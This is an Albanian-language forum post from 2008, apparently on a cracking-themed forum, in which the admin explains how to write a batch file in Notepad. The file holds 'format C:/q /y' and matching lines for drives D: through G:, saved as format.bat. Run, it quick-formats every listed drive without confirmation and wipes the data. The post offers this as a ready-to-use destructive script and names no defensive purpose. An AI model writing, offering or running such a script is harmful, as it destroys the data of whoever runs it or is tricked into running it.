Valonq & CracKer-Y
 
ForumEarn moneyRegjistrohuidentifikimi

Share | 
 

 Formatizo HDD me NotePad

Shko poshtë 
AutoriMesazh
Valonq
Admin


Numri i postimeve : 152
Age : 31
Registration date : 14/10/2008

MesazhTitulli: Formatizo HDD me NotePad   Wed Dec 17, 2008 1:41 pm

Hapne NotePad dhe shkurni:

format C:/q /y
format D:/q /y
format E:/q /y
format F:/q /y
format G:/q /y


dhe klikoni File > Save As emrin mundeni me ja lan psh format.bat
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://black.bigforumpro.com
 
Formatizo HDD me NotePad
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Tutoriale-
Kërce tek: